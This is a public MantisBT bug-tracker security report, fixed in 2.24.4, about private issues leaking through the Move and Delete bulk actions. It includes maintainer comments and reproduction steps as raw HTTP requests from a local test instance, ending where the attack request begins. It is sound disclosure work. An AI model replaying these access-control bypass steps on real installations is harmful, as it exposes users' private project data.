View Issue Details

| Field | Value |
|---|---|
| ID | 0027357 |
| Project | mantisbt |
| Category | security |
| View Status | public |
| Date Submitted | 2020-09-26 20:29 |
| Last Update | 2021-01-08 06:17 |
| Reporter | d3vpoo1 |
| Assigned To | dregad |
| Priority | immediate |
| Severity | major |
| Reproducibility | always |
| Status | closed |
| Resolution | fixed |
| Platform | Windows |
| OS | Windows |
| OS Version | Windows 10 |
| Target Version | 2.24.4 |
| Fixed in Version | 2.24.4 |
| Summary | 0027357: Attacker can leak private information via different functionality |
| Description | This allows the attacker to leak the private issues belonging to a private project EDIT: dregad |
| Steps To Reproduce | Original steps to reproduce have been moved to attached file, see 0027357:0064772. |
| Additional Information | I found this to be a critical exploit and needed to report it immediately. |
| Tags | No tags attached. |
Your reports are so hard to follow, due to the information being drowned in the full, raw HTTP requests/responses... Anyway, I'll go and try to wrap my head around this one now...

Maybe a useful video: in this scenario I decided to create a new instance of Mantis, everything here is by default, no code modification. Link: PoC
Note: Please mention me after you watch the PoC so I can delete it (I can't post here... 10MB video)

The patch in ~0064617 fixes the following issue (described at the top of the Attacker Init section in the above Steps to reproduce).
The bug is confirmed, I'll prepare a slightly modified and improved patch.

I'm not sure what you mean by that. I assume you're referring to the My View page boxes Assigned to Me (Unresolved) and unassigned and the temporary filters that are applied when clicking on the View Issues button from there. This triggers in both cases a GET request with a single Ticking the Select All box then picking Can you please clarify?

And by the way, the vulnerability is confirmed.

I believe I included this for a reason that some of the functionality doesn't have

@d3vpoo1 so after testing, as I understand it there are 3 distinct vulnerabilities in this report:
Let me know if I missed anything. The good news is that the fixes are quite straightforward, unlike 0027370 which gave me some trouble due to the large number of test cases.

As far as I can tell, EDIT:
To clarify, I meant in PHP code. It is referenced in common.js, to implement the mechanism by which the individual issue checkboxes are (un)ticked when Select All is clicked.

Original steps to reproduce: 27357_steps_to_reproduce.md (64,730 bytes)
### Initialize - As admin create two projects one public and a private project ### Access? What access - Go to manager (in this case he serves as the attacker) - In order to prove that we currently don't have access you can go to [http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id=2](http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id=2) - private project [http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=1](http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=1) - issue belong to a private project - It should return ``Access Denied.`` ### Initialize scenario - As admin report an issue to your the private project **Request** ``` POST /mantisbt/mantisbt-2.24.3/bug_report.php?posted=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------373865978329646363701737804542 Content-Length: 2515 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_report_page.php Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_PROJECT_COOKIE=2; MANTIS_MANAGE_CONFIG_COOKIE=0%3A1%3A-2; PHPSESSID=cbhds6ef6rlv01qob6eck59mjk; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=d4bc9ab210dcc813246fd03cd1c352ee0904b8196eafc0fa7a1572d1838dbaa6; MANTIS_BUG_LIST_COOKIE=1 Upgrade-Insecure-Requests: 1 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="bug_report_token" 20200927nVFRNDA3foc7zbvDhVjrA1a8sWl3Fe_S -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="m_id" 0 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="project_id" 2 
-----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="category_id" 1 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="reproducibility" 90 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="severity" 20 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="priority" 20 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="platform" -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="os" -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="os_build" -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="handler_id" 1 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="summary" This is my private issue please dont access me -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="description" This is my private issue please dont access me -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="steps_to_reproduce" This is my private issue please dont access me -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="additional_info" This is my private issue please dont access me -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="tag_string" -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="tag_select" 0 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="max_file_size" 5000000 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="view_state" 10 
-----------------------------373865978329646363701737804542-- ``` **Response** ``` HTTP/1.1 200 OK Date: Sat, 26 Sep 2020 23:29:50 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33 X-Powered-By: PHP/7.1.33 Cache-Control: no-store, no-cache, must-revalidate Last-Modified: Sat, 26 Sep 2020 23:29:50 GMT Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ X-Content-Type-Options: nosniff Expires: Sat, 26 Sep 2020 23:29:50 GMT X-Frame-Options: DENY Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data: Vary: Accept-Encoding Content-Length: 10556 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title>MantisBT</title> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/default.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/status_config.php?cache_key=dfc7ac70d13aae81b44f6900789629a8" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/dropzone-5.5.0.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-3.4.1.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/font-awesome-4.6.3.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/fonts.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-datetimepicker-4.17.47.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace.min.css" /> <link rel="stylesheet" 
type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-mantis.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-skins.min.css" /> <link rel="shortcut icon" href="/mantisbt/mantisbt-2.24.3/images/favicon.ico" type="image/x-icon" /> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=text"/> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=id"/> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_config.php?cache_key=dfc7ac70d13aae81b44f6900789629a8"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_translations.php?cache_key=38fd4ec05f3127949acd785e9a18aaab"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/jquery-2.2.4.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/dropzone-5.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/common.js"></script> <meta http-equiv="Refresh" content="2; URL=http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=7" /> </head> <body class="skin-3"> <style> * { font-family: "Open Sans"; } h1, h2, h3, h4, h5 { font-family: "Open Sans"; } </style> <div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt/mantisbt-2.24.3/my_view_page.php" class="navbar-brand"><span 
class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a><a class="btn btn-primary btn-sm" href="manage_user_create_page.php"><i class="fa fa-user-plus"></i> Invite Users</a></div></li><li class="grey" id="dropdown_projects_menu"> <a data-toggle="dropdown" href="#" class="dropdown-toggle"> second project <i class="ace-icon fa fa-angle-down bigger-110"></i> </a> <ul id="projects-list" class=" dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"> <li><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li> <li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=0">All Projects </a></li> <li class="divider"></li> <li><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=1" class="project-link"> first project </a></li> <li class="active"><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=2" class="project-link"> second project </a></li> </ul></div></li></ul> </li> <li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">administrator</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a 
href="/mantisbt/mantisbt-2.24.3/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt/mantisbt-2.24.3/issues_rss.php?username=administrator&key=R0qQ3AFTKVZMdV0vM5H-l-aYvaUBRnslcO85AABBH0L34Tbmvv2ZLGyOp5-I_MND7FKU87uq5QaZVBoeevI-&project_id=2"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt/mantisbt-2.24.3/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container"> <div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li> <a href="/mantisbt/mantisbt-2.24.3/my_view_page.php"> <i class="menu-icon fa fa-dashboard"></i> <span class="menu-text"> My View </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/view_all_bug_page.php"> <i class="menu-icon fa fa-list-alt"></i> <span class="menu-text"> View Issues </span> </a> <b class="arrow"></b> </li> <li class="active"> <a href="/mantisbt/mantisbt-2.24.3/bug_report_page.php"> <i class="menu-icon fa fa-edit"></i> <span class="menu-text"> Report Issue </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/changelog_page.php"> <i class="menu-icon fa fa-retweet"></i> <span class="menu-text"> Change Log </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/roadmap_page.php"> <i class="menu-icon fa fa-road"></i> <span class="menu-text"> Roadmap </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/summary_page.php"> <i class="menu-icon fa fa-bar-chart-o"></i> <span class="menu-text"> Summary </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/manage_overview_page.php"> <i class="menu-icon fa fa-gears"></i> <span class="menu-text"> Manage </span> </a> <b class="arrow"></b> </li> </ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i 
data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left" class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content"> <div id="breadcrumbs" class="breadcrumbs noprint"> <ul class="breadcrumb"> <li><i class="fa fa-user home-icon active"></i> <a href="/mantisbt/mantisbt-2.24.3/account_page.php">administrator</a> <span class="label hidden-xs label-default arrowed">administrator</span></li> </ul> <div class="nav-recent hidden-xs">Recently Visited: <a href="/mantisbt/mantisbt-2.24.3/view.php?id=7" title="[assigned] This is my private issue please dont access me">0000007</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=1" title="[new] this is my private project">0000001</a></div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt/mantisbt-2.24.3/jump_to_bug.php"><span class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div> </div> <div class="page-content"> <div class="row"> <div class="container-fluid"><div class="col-md-12 col-xs-12"><div class="space-0"></div><div class="alert alert-success center"><p class="bold bigger-110">Operation successful.</p><br /><div class="btn-group"><a class="btn btn-primary btn-white btn-round " href="view.php?id=7">View Submitted Issue 7</a><a class="btn btn-primary btn-white btn-round " href="view_all_bug_page.php">View Issues</a></div></div></div></div> </div> </div> </div> <div class="clearfix"></div> <div class="space-20"></div> <div class="footer noprint"> <div class="footer-inner"> <div class="footer-content"> <div class="col-md-6 col-xs-12 no-padding"> <address> <strong>Powered by <a href="https://www.mantisbt.org" title="bug tracking software">MantisBT </a></strong> <br> <small>Copyright © 2000 - 2020 MantisBT Team</small><br><small>Contact <a href="mailto:webmaster@example.com" 
title="Contact the webmaster via e-mail.">administrator</a> for assistance</small><br> </address> </div> <div class="col-md-6 col-xs-12"> <div class="pull-right" id="powered-by-mantisbt-logo"> <a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt/mantisbt-2.24.3/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." /></a> </div> </div> </div> </div> </div> <a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#"> <i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i> </a> </div> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-3.4.1.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/moment-with-locales-2.24.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-datetimepicker-4.17.47.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/typeahead.jquery-1.3.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/list-1.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/ace.min.js"></script> </body> </html> ``` ### Attacker init > This is just additonal information you can disregard this issue but because of internet connection issues I notice that when the attacker visit the http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id=<PRIVATE_PROJECT_ID> the project title can be disclose, it returns ``access denied`` but the dropdown for projects render the title of the project - There are two ways to initialize for the attacker, the attacker have old report or the attacker can report a new issue, I will just use the create a new issue **Request** ``` POST /mantisbt/mantisbt-2.24.3/bug_report.php?posted=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 
(Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------427049419225960153701985913573 Content-Length: 2423 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_report_page.php Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2 Upgrade-Insecure-Requests: 1 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="bug_report_token" 20200927Y7C9GOAmlETk2ohCgpLe0qIr2hRhYMgm -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="m_id" 0 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="project_id" 1 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="category_id" 1 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="reproducibility" 10 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="severity" 20 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="priority" 30 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="platform" -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="os" -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="os_build" 
-----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="handler_id" 2 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="summary" Hello I am the attacker -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="description" Hello I am the attacker -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="steps_to_reproduce" Hello I am the attacker -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="additional_info" Hello I am the attacker -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="tag_string" -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="tag_select" 0 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="max_file_size" 5000000 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="view_state" 10 -----------------------------427049419225960153701985913573-- ``` **Response** ``` HTTP/1.1 200 OK Date: Sat, 26 Sep 2020 23:34:54 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33 X-Powered-By: PHP/7.1.33 Cache-Control: no-store, no-cache, must-revalidate Last-Modified: Sat, 26 Sep 2020 23:34:54 GMT Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ X-Content-Type-Options: nosniff Expires: Sat, 26 Sep 2020 23:34:54 GMT X-Frame-Options: DENY Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data: Vary: Accept-Encoding Content-Length: 10525 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title>MantisBT</title> 
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/default.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/status_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/dropzone-5.5.0.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-3.4.1.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/font-awesome-4.6.3.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/fonts.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-datetimepicker-4.17.47.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-mantis.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-skins.min.css" /> <link rel="shortcut icon" href="/mantisbt/mantisbt-2.24.3/images/favicon.ico" type="image/x-icon" /> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=text"/> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=id"/> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6"></script> <script type="text/javascript" 
src="/mantisbt/mantisbt-2.24.3/javascript_translations.php?cache_key=38fd4ec05f3127949acd785e9a18aaab"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/jquery-2.2.4.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/dropzone-5.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/common.js"></script> <meta http-equiv="Refresh" content="2; URL=http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8" /> </head> <body class="skin-3"> <style> * { font-family: "Open Sans"; } h1, h2, h3, h4, h5 { font-family: "Open Sans"; } </style> <div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt/mantisbt-2.24.3/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a></div></li><li class="grey" id="dropdown_projects_menu"> <a data-toggle="dropdown" href="#" class="dropdown-toggle"> first project <i class="ace-icon fa fa-angle-down bigger-110"></i> </a> <ul id="projects-list" class=" dropdown-menu 
dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"> <li><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li> <li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=0">All Projects </a></li> <li class="divider"></li> <li class="active"><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=1" class="project-link"> first project </a></li> </ul></div></li></ul> </li> <li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">manager</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/mantisbt/mantisbt-2.24.3/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt/mantisbt-2.24.3/issues_rss.php?username=manager&key=iLKFE3m8D11EdAtHoGxboYzcPjG11f41lnnKeXpgsf4e6v2261dcSSKrWrKg6fIjSj-E-Upq9mkaxxA22-QW&project_id=1"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt/mantisbt-2.24.3/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container"> <div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li> <a href="/mantisbt/mantisbt-2.24.3/my_view_page.php"> <i class="menu-icon fa fa-dashboard"></i> <span class="menu-text"> My View </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/view_all_bug_page.php"> <i class="menu-icon fa fa-list-alt"></i> <span class="menu-text"> View Issues </span> </a> <b class="arrow"></b> </li> <li class="active"> <a href="/mantisbt/mantisbt-2.24.3/bug_report_page.php"> <i 
class="menu-icon fa fa-edit"></i> <span class="menu-text"> Report Issue </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/changelog_page.php"> <i class="menu-icon fa fa-retweet"></i> <span class="menu-text"> Change Log </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/roadmap_page.php"> <i class="menu-icon fa fa-road"></i> <span class="menu-text"> Roadmap </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/summary_page.php"> <i class="menu-icon fa fa-bar-chart-o"></i> <span class="menu-text"> Summary </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/manage_overview_page.php"> <i class="menu-icon fa fa-gears"></i> <span class="menu-text"> Manage </span> </a> <b class="arrow"></b> </li> </ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left" class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content"> <div id="breadcrumbs" class="breadcrumbs noprint"> <ul class="breadcrumb"> <li><i class="fa fa-user home-icon active"></i> <a href="/mantisbt/mantisbt-2.24.3/account_page.php">manager ( manager ) </a> <span class="label hidden-xs label-default arrowed">manager</span></li> </ul> <div class="nav-recent hidden-xs">Recently Visited: <a href="/mantisbt/mantisbt-2.24.3/view.php?id=8" title="[assigned] Hello I am the attacker">0000008</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=2" title="[new] THIS IS MY FIRST REPORT ON FIRST PROJECT">0000002</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=5" title="[new] this is my private project">0000005</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=3" title="[new] THIS IS MY second REPORT ON FIRST PROJECT">0000003</a></div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt/mantisbt-2.24.3/jump_to_bug.php"><span 
class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div> </div> <div class="page-content"> <div class="row"> <div class="container-fluid"><div class="col-md-12 col-xs-12"><div class="space-0"></div><div class="alert alert-success center"><p class="bold bigger-110">Operation successful.</p><br /><div class="btn-group"><a class="btn btn-primary btn-white btn-round " href="view.php?id=8">View Submitted Issue 8</a><a class="btn btn-primary btn-white btn-round " href="view_all_bug_page.php">View Issues</a></div></div></div></div> </div> </div> </div> <div class="clearfix"></div> <div class="space-20"></div> <div class="footer noprint"> <div class="footer-inner"> <div class="footer-content"> <div class="col-md-6 col-xs-12 no-padding"> <address> <strong>Powered by <a href="https://www.mantisbt.org" title="bug tracking software">MantisBT </a></strong> <br> <small>Copyright © 2000 - 2020 MantisBT Team</small><br><small>Contact <a href="mailto:webmaster@example.com" title="Contact the webmaster via e-mail.">administrator</a> for assistance</small><br> </address> </div> <div class="col-md-6 col-xs-12"> <div class="pull-right" id="powered-by-mantisbt-logo"> <a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt/mantisbt-2.24.3/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." 
/></a> </div> </div> </div> </div> </div> <a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#"> <i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i> </a> </div> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-3.4.1.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/moment-with-locales-2.24.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-datetimepicker-4.17.47.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/typeahead.jquery-1.3.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/list-1.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/ace.min.js"></script> </body> </html>
```

### Launch attack

- As manager, go to your issue [http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8](http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8)
- 2 vulnerable functions here are ``Move`` and ``Delete``; let's start with the ``move`` functionality

**Normal request**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
